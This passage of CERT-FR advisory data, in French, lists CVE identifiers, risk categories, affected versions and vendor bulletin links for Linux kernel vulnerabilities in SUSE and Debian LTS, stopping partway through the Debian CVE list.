"name": "CVE-2023-54325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54325"
},
{
"name": "CVE-2023-54121",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54121"
},
{
"name": "CVE-2023-54261",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54261"
},
{
"name": "CVE-2023-54005",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54005"
},
{
"name": "CVE-2022-50770",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50770"
},
{
"name": "CVE-2025-40351",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40351"
},
{
"name": "CVE-2025-68264",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68264"
},
{
"name": "CVE-2022-50755",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50755"
},
{
"name": "CVE-2025-68764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68764"
}
],
"initial_release_date": "2026-02-27T00:00:00",
"last_revision_date": "2026-02-27T00:00:00",
"links": [],
"reference": "CERTFR-2026-AVI-0225",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2026-02-27T00:00:00.000000"
}
],
"risks": [
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Ex\u00e9cution de code arbitraire"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "D\u00e9ni de service"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans le noyau Linux de SUSE. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire, une \u00e9l\u00e9vation de privil\u00e8ges et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans le noyau Linux de SUSE",
"vendor_advisories": [
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20465-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620465-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20457-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620457-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20461-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620461-1"
},
{
"published_at": "2026-02-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20477-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620477-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20459-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620459-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20468-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620468-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20471-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620471-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20464-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620464-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20470-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620470-1"
},
{
"published_at": "2026-02-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0617-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260617-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20458-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620458-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20456-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620456-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20473-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620473-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20463-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620463-1"
},
{
"published_at": "2026-02-20",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:0587-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-20260587-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20467-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620467-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20466-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620466-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20478-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620478-1"
},
{
"published_at": "2026-02-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20476-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620476-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20462-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620462-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20460-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620460-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20469-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620469-1"
},
{
"published_at": "2026-02-24",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20479-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620479-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20472-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620472-1"
},
{
"published_at": "2026-02-19",
"title": "Bulletin de s\u00e9curit\u00e9 SUSE SUSE-SU-2026:20455-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620455-1"
}
]
}
CERTFR-2026-AVI-0167
Vulnerability from certfr_avis - Published: 2026-02-13 - Updated: 2026-02-13
De multiples vulnérabilités ont été découvertes dans le noyau Linux de Debian LTS. Elles permettent à un attaquant de provoquer une élévation de privilèges, une atteinte à la confidentialité des données et un déni de service.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
References
| Title | Publication Time | Tags | ||||||
|---|---|---|---|---|---|---|---|---|
|
||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Debian LTS bullseye versions ant\u00e9rieures \u00e0 5.10.249-1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
},
{
"description": "Debian LTS bullseye versions ant\u00e9rieures \u00e0 6.1.162-1~deb11u1",
"product": {
"name": "Debian",
"vendor": {
"name": "Debian",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2024-36903",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36903"
},
{
"name": "CVE-2025-71075",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71075"
},
{
"name": "CVE-2025-71086",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71086"
},
{
"name": "CVE-2025-22083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22083"
},
{
"name": "CVE-2025-22107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22107"
},
{
"name": "CVE-2026-23098",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23098"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2025-38104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38104"
},
{
"name": "CVE-2025-68380",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68380"
},
{
"name": "CVE-2025-39702",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39702"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2023-53421",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53421"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2022-49465",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49465"
},
{
"name": "CVE-2025-71071",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71071"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-68364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68364"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2025-40039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40039"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2025-68773",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68773"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2026-23020",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23020"
},
{
"name": "CVE-2025-68796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68796"
},
{
"name": "CVE-2022-49168",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49168"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-68769",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68769"
},
{
"name": "CVE-2025-71189",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71189"
},
{
"name": "CVE-2025-38408",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38408"
},
{
"name": "CVE-2025-71088",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71088"
},
{
"name": "CVE-2026-23090",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23090"
},
{
"name": "CVE-2022-49711",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49711"
},
{
"name": "CVE-2026-23064",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23064"
},
{
"name": "CVE-2025-38591",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38591"
},
{
"name": "CVE-2025-68806",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68806"
},
{
"name": "CVE-2025-71098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71098"
},
{
"name": "CVE-2025-71078",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71078"
},
{
"name": "CVE-2025-71083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71083"
},
{
"name": "CVE-2026-23061",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23061"
},
{
"name": "CVE-2025-68813",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68813"
},
{
"name": "CVE-2026-23047",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23047"
},
{
"name": "CVE-2025-22121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22121"
},
{
"name": "CVE-2025-68365",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68365"
},
{
"name": "CVE-2025-71085",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71085"
},
{
"name": "CVE-2025-68344",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68344"
},
{
"name": "CVE-2025-71154",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71154"
},
{
"name": "CVE-2025-68257",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68257"
},
{
"name": "CVE-2025-71084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71084"
},
{
"name": "CVE-2026-23049",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23049"
},
{
"name": "CVE-2022-49743",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49743"
},
{
"name": "CVE-2025-68347",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68347"
},
{
"name": "CVE-2025-68814",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68814"
},
{
"name": "CVE-2025-68780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68780"
},
{
"name": "CVE-2025-71081",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71081"
},
{
"name": "CVE-2026-23101",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23101"
},
{
"name": "CVE-2026-23099",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23099"
},
{
"name": "CVE-2025-71121",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71121"
},
{
"name": "CVE-2025-38022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38022"
},
{
"name": "CVE-2026-23085",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23085"
},
{
"name": "CVE-2025-71136",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71136"
},
{
"name": "CVE-2025-68354",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68354"
},
{
"name": "CVE-2025-68801",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68801"
},
{
"name": "CVE-2025-22090",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22090"
},
{
"name": "CVE-2025-68258",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68258"
},
{
"name": "CVE-2025-39871",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39871"
},
{
"name": "CVE-2025-37926",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37926"
},
{
"name": "CVE-2025-68291",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68291"
},
{
"name": "CVE-2026-22991",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22991"
},
{
"name": "CVE-2025-21946",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21946"
},
{
"name": "CVE-2025-68255",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68255"
},
{
"name": "CVE-2026-22980",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22980"
},
{
"name": "CVE-2025-71093",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71093"
},
{
"name": "CVE-2025-71102",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71102"
},
{
"name": "CVE-2025-68759",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68759"
},
{
"name": "CVE-2026-23019",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23019"
},
{
"name": "CVE-2025-68733",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68733"
},
{
"name": "CVE-2026-23005",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23005"
},
{
"name": "CVE-2025-68335",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68335"
},
{
"name": "CVE-2025-71079",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71079"
},
{
"name": "CVE-2026-23030",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23030"
},
{
"name": "CVE-2026-22997",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22997"
},
{
"name": "CVE-2025-71196",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71196"
},
{
"name": "CVE-2025-68772",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68772"
},
{
"name": "CVE-2026-23078",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23078"
},
{
"name": "CVE-2025-68785",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68785"
},
{
"name": "CVE-2025-71130",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71130"
},
{
"name": "CVE-2025-68808",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68808"
},
{
"name": "CVE-2025-68223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68223"
},
{
"name": "CVE-2025-68783",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68783"
},
{
"name": "CVE-2025-71147",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71147"
},
{
"name": "CVE-2025-68724",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68724"
},
{
"name": "CVE-2026-23103",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23103"
},
{
"name": "CVE-2026-23074",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23074"
},
{
"name": "CVE-2025-71126",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71126"
},
{
"name": "CVE-2025-68786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68786"
},
{
"name": "CVE-2025-71199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71199"
},
{
"name": "CVE-2024-42079",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42079"
},
{
"name": "CVE-2025-68797",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68797"
},
{
"name": "CVE-2024-49968",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49968"
},
{
"name": "CVE-2025-68259",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68259"
},
{
"name": "CVE-2025-71125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71125"
},
{
"name": "CVE-2026-23006",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23006"
},
{
"name": "CVE-2025-71108",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71108"
},
{
"name": "CVE-2025-71069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71069"
},
{
"name": "CVE-2026-22994",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22994"
},
{
"name": "CVE-2026-23083",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23083"
},
{
"name": "CVE-2025-68774",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68774"
},
{
"name": "CVE-2026-23108",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23108"
},
{
"name": "CVE-2025-38119",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38119"
},
{
"name": "CVE-2025-71180",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71180"
},
{
"name": "CVE-2025-38232",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38232"
},
{
"name": "CVE-2025-71194",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71194"
},
{
"name": "CVE-2025-37830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37830"
},
{
"name": "CVE-2026-22999",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22999"
},
{
"name": "CVE-2025-71082",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71082"
},
{
"name": "CVE-2026-23068",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23068"
},
{
"name": "CVE-2025-68765",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68765"
},
{
"name": "CVE-2026-23089",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23089"
},
{
"name": "CVE-2025-71132",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71132"
},
{
"name": "CVE-2026-23071",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23071"
},
{
"name": "CVE-2026-23056",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23056"
},
{
"name": "CVE-2025-71077",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71077"
},
{
"name": "CVE-2024-36927",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36927"
},
{
"name": "CVE-2023-54321",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54321"
},
{
"name": "CVE-2025-22111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22111"
},
{
"name": "CVE-2026-23063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23063"
},
{
"name": "CVE-2026-23073",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23073"
},
{
"name": "CVE-2025-71114",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71114"
},
{
"name": "CVE-2026-23058",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23058"
},
{
"name": "CVE-2025-71182",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71182"
},
{
"name": "CVE-2026-23038",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23038"
},
{
"name": "CVE-2026-22990",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22990"
},
{
"name": "CVE-2025-71186",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71186"
},
{
"name": "CVE-2025-68821",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68821"
},
{
"name": "CVE-2026-23026",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23026"
},
{
"name": "CVE-2025-68325",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68325"
},
{
"name": "CVE-2025-71190",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71190"
},
{
"name": "CVE-2026-23107",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23107"
},
{
"name": "CVE-2025-68332",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68332"
},
{
"name": "CVE-2025-71104",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71104"
},
{
"name": "CVE-2026-22978",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22978"
},
{
"name": "CVE-2025-38129",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38129"
},
{
"name": "CVE-2026-23037",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23037"
},
{
"name": "CVE-2026-23001",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23001"
},
{
"name": "CVE-2025-68367",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68367"
},
{
"name": "CVE-2025-68820",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68820"
},
{
"name": "CVE-2023-54207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54207"
},
{
"name": "CVE-2025-68740",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68740"
},
{
"name": "CVE-2025-68742",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68742"
},
{
"name": "CVE-2026-23025",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23025"
},
{
"name": "CVE-2024-46786",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46786"
},
{
"name": "CVE-2025-68816",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68816"
},
{
"name": "CVE-2025-68256",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68256"
},
{
"name": "CVE-2025-68777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68777"
},
{
"name": "CVE-2025-68254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68254"
},
{
"name": "CVE-2025-38556",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38556"
},
{
"name": "CVE-2026-22982",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22982"
},
{
"name": "CVE-2025-71118",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71118"
},
{
"name": "CVE-2025-71150",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71150"
},
{
"name": "CVE-2025-39721",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39721"
},
{
"name": "CVE-2026-23091",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23091"
},
{
"name": "CVE-2025-38718",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38718"
},
{
"name": "CVE-2025-71192",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71192"
},
{
"name": "CVE-2025-68776",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68776"
},
{
"name": "CVE-2025-71066",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71066"
},
{
"name": "CVE-2025-68799",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68799"
},
{
"name": "CVE-2025-68345",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68345"
},
{
"name": "CVE-2025-71097",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71097"
},
{
"name": "CVE-2025-71111",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71111"
},
{
"name": "CVE-2026-23087",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23087"
},
{
"name": "CVE-2025-71185",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71185"
},
{
"name": "CVE-2026-23096",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23096"
},
{
"name": "CVE-2025-68337",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68337"
},
{
"name": "CVE-2025-71131",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71131"
},
{
"name": "CVE-2025-40149",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40149"
},
{
"name": "CVE-2025-40164",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40164"
},
{
"name": "CVE-2025-71116",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71116"
},
{
"name": "CVE-2023-52658",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52658"
},
{
"name": "CVE-2025-68362",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68362"
},
{
"name": "CVE-2025-71162",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71162"
},
{
"name": "CVE-2026-23075",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23075"
},
{
"name": "CVE-2025-68803",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68803"
},
{
"name": "CVE-2026-23105",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23105"
},
{
"name": "CVE-2026-22976",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22976"
},
{
"name": "CVE-2025-68753",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68753"
},
{
"name": "CVE-2025-68781",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68781"
},
{
"name": "CVE-2025-68369",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68369"
},
{
"name": "CVE-2025-71112",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71112"
},
{
"name": "CVE-2023-54285",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54285"
},
{
"name": "CVE-2026-23086",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23086"
},
{
"name": "CVE-2025-22022",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22022"
},
{
"name": "CVE-2025-68818",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68818"
},
{
"name": "CVE-2025-38125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38125"
},
{
"name": "CVE-2025-68366",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68366"
},
{
"name": "CVE-2025-68815",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68815"
},
{
"name": "CVE-2025-40215",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40215"
},
{
"name": "CVE-2026-23095",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23095"
},
{
"name": "CVE-2025-68346",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68346"
},
{
"name": "CVE-2025-71163",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71163"
},
{
"name": "CVE-2025-71096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71096"
},
{
"name": "CVE-2025-71095",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71095"
},
{
"name": "CVE-2025-71105",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71105"
},
{
"name": "CVE-2025-68266",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68266"
},
{
"name": "CVE-2025-68771",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68771"
},
{
"name": "CVE-2025-68363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68363"
},
{
"name": "CVE-2026-22984",
